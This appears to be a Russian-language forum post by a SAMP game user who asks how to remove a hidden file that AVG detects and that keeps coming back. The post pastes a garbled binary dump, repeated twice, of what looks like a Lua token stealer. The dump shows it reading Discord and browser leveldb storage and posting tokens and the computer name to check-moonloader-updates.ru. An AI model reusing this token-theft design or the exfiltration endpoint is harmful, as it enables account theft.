- 746
- 259
В AVG он есть
В папке его нет... Через AVG удаляю самп заходит, не удаляю - незаходит.
Т.К. в папке его нет - открыл через AVG вот че внутри
LJZ 6 9 ) ' B 9
XЂ 9 ) B L subsourceSgetinfo
debugк ;4 - 9 ' B- 99 ' & B- 9' )яяB X&ЂU Ђ- 9: 9B 9 '
B XЂ 9 ' B XЂ ' &<- 99
B XЯ- 99 BL АFindCloseFindNextFileA/%.ldb$%.log$ findcFileNamestring
void* cast/*FindFirstFileACWIN32_FIND_DATA[1]new¤
L ' & 4 - B) ) M<Ђ6 98' B
X4Ђ 9'
B )
X )Ђ) 9
'
B
X!Ђ
XЂ
XЂ
! ) Xм
Xй Xж 9)ияB
&< X
Ш
9 B OД6
9 ' D А
concat
table
closesub$([-_%w]+)(%.[-_%w]+%.)([-_%w]+) find*a readrb openio/Local Storage/leveldb6т 6- 9 ' ) , ) B
X,Ђ- 9 )P ,
) ) )
B
XЂ- 9 ,
)
) B
X
Ђ' - 9
B- 9 B- 9 B- 9 BK АInternetCloseHandleHttpSendRequestA4Content-Type: application/x-www-form-urlencodedHttpOpenRequestAInternetConnectAMozilla/5.0InternetOpenAл
7' 6 - BHЂ- 9 B XЂ- B ) XЂ ' & FRн' 6 9' B' & - ' - '
B- B
XЂ- 99 )Ђ B XЂ6 9
BK АА А
ААА АremoveSetFileAttributesAC/uploadTokens.php POST
&tokens=COMPUTERNAMEgetenvoscomputerName=
PathFileExistsA
pairsѓ
! ?6 ' B 9 ' B9 ' B9 ' B' 6 9 '
B' &6 9 ' B' &5 '
&= ' &= ' &= ' &= ' &= ' &= ' &=3 3 3 3
3 B2 ЂK Yandex+Yandex/YandexBrowser/User Data/Default
Brave2BraveSoftware/Brave-Browser/User Data/Default
Opera Opera Software/Opera StableGoogleChrome$Google/Chrome/User Data/DefaultDiscordPTBdiscordptbDiscordCanarydiscordcanaryDiscord discordAPPDATA/LOCALAPPDATAgetenvos check-moonloader-updates.ruwininetshlwapi loadҐ
typedef struct _FILETIME
{
unsigned long dwLowDateTime;
unsigned long dwHighDateTime;
} FILETIME;
typedef struct _WIN32_FIND_DATA
{
unsigned long dwFileAttributes;
FILETIME ftCreationTime;
FILETIME ftLastAccessTime;
FILETIME ftLastWriteTime;
unsigned long nFileSizeHigh;
unsigned long nFileSizeLow;
unsigned long dwReserved0;
unsigned long dwReserved1;
char cFileName[260];
char cAlternateFileName[14];
} WIN32_FIND_DATA, *LPWIN32_FIND_DATA;
void* __stdcall FindFirstFileA(const char*, LPWIN32_FIND_DATA);
bool __stdcall FindNextFileA(void*, LPWIN32_FIND_DATA);
bool __stdcall FindClose(void*);
bool __stdcall PathFileExistsA(const char*);
void* __stdcall InternetOpenA(const char*, unsigned long, const char*, const char*, unsigned long);
void* __stdcall InternetConnectA(void*, const char*, unsigned short, const char*,
const char*, unsigned long, unsigned long, unsigned long);
void* __stdcall HttpOpenRequestA(void*, const char*, const char*, const char*,
const char*, const char*, unsigned long, unsigned long);
bool __stdcall HttpSendRequestA(void*, const char*, unsigned long, const char*, unsigned long);
bool __stdcall InternetCloseHandle(void*);
bool __stdcall SetFileAttributesA(const char*, unsigned long);
cdefffirequire
XЂ 9 ) B L subsourceSgetinfo
debugк ;4 - 9 ' B- 99 ' & B- 9' )яяB X&ЂU Ђ- 9: 9B 9 '
B XЂ 9 ' B XЂ ' &<- 99
B XЯ- 99 BL АFindCloseFindNextFileA/%.ldb$%.log$ findcFileNamestring
void* cast/*FindFirstFileACWIN32_FIND_DATA[1]new¤
L ' & 4 - B) ) M<Ђ6 98' B
X4Ђ 9'
B )
X )Ђ) 9
'
B
X!Ђ
XЂ
XЂ
! ) Xм
Xй Xж 9)ияB
&< X
Ш
9 B OД6
9 ' D А
concat
table
closesub$([-_%w]+)(%.[-_%w]+%.)([-_%w]+) find*a readrb openio/Local Storage/leveldb6т 6- 9 ' ) , ) B
X,Ђ- 9 )P ,
) ) )
B
XЂ- 9 ,
)
) B
X
Ђ' - 9
B- 9 B- 9 B- 9 BK АInternetCloseHandleHttpSendRequestA4Content-Type: application/x-www-form-urlencodedHttpOpenRequestAInternetConnectAMozilla/5.0InternetOpenAл
7' 6 - BHЂ- 9 B XЂ- B ) XЂ ' & FRн' 6 9' B' & - ' - '
B- B
XЂ- 99 )Ђ B XЂ6 9
BK АА А
ААА АremoveSetFileAttributesAC/uploadTokens.php POST
&tokens=COMPUTERNAMEgetenvoscomputerName=
PathFileExistsA
pairsѓ
! ?6 ' B 9 ' B9 ' B9 ' B' 6 9 '
B' &6 9 ' B' &5 '
&= ' &= ' &= ' &= ' &= ' &= ' &=3 3 3 3
3 B2 ЂK Yandex+Yandex/YandexBrowser/User Data/Default
Brave2BraveSoftware/Brave-Browser/User Data/Default
Opera Opera Software/Opera StableGoogleChrome$Google/Chrome/User Data/DefaultDiscordPTBdiscordptbDiscordCanarydiscordcanaryDiscord discordAPPDATA/LOCALAPPDATAgetenvos check-moonloader-updates.ruwininetshlwapi loadҐ
typedef struct _FILETIME
{
unsigned long dwLowDateTime;
unsigned long dwHighDateTime;
} FILETIME;
typedef struct _WIN32_FIND_DATA
{
unsigned long dwFileAttributes;
FILETIME ftCreationTime;
FILETIME ftLastAccessTime;
FILETIME ftLastWriteTime;
unsigned long nFileSizeHigh;
unsigned long nFileSizeLow;
unsigned long dwReserved0;
unsigned long dwReserved1;
char cFileName[260];
char cAlternateFileName[14];
} WIN32_FIND_DATA, *LPWIN32_FIND_DATA;
void* __stdcall FindFirstFileA(const char*, LPWIN32_FIND_DATA);
bool __stdcall FindNextFileA(void*, LPWIN32_FIND_DATA);
bool __stdcall FindClose(void*);
bool __stdcall PathFileExistsA(const char*);
void* __stdcall InternetOpenA(const char*, unsigned long, const char*, const char*, unsigned long);
void* __stdcall InternetConnectA(void*, const char*, unsigned short, const char*,
const char*, unsigned long, unsigned long, unsigned long);
void* __stdcall HttpOpenRequestA(void*, const char*, const char*, const char*,
const char*, const char*, unsigned long, unsigned long);
bool __stdcall HttpSendRequestA(void*, const char*, unsigned long, const char*, unsigned long);
bool __stdcall InternetCloseHandle(void*);
bool __stdcall SetFileAttributesA(const char*, unsigned long);
cdefffirequire
как удалить его, удаляю - он востанавливается
ps: скрытые файлы включены.
